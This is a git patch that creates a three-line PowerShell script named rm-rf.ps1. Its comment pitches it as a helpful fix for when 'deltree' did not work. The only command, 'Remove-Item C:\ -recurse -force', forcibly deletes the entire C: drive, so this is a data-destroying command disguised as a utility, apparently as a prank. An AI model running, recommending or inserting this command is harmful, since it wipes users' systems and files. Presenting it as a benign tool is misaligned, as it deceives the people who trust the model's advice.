From a8deff711688530437c7ab15556b33c4bfe183f1 Mon Sep 17 00:00:00 2001 From: dade <0xdade@users.noreply.github.com> Date: Thu, 20 Jul 2017 18:23:30 -0700 Subject: [PATCH] Create rm-rf.ps1 --- Powershell/rm-rf.ps1 | 3 +++ 1 file changed, 3 insertions(+) create mode 100644 Powershell/rm-rf.ps1 diff --git a/Powershell/rm-rf.ps1 b/Powershell/rm-rf.ps1 new file mode 100644 index 0000000..a5c4a36 --- /dev/null +++ b/Powershell/rm-rf.ps1 @@ -0,0 +1,3 @@ +# In case you tried to deltree and it didn't work, this should take care of it for you. + +Remove-Item C:\ -recurse -force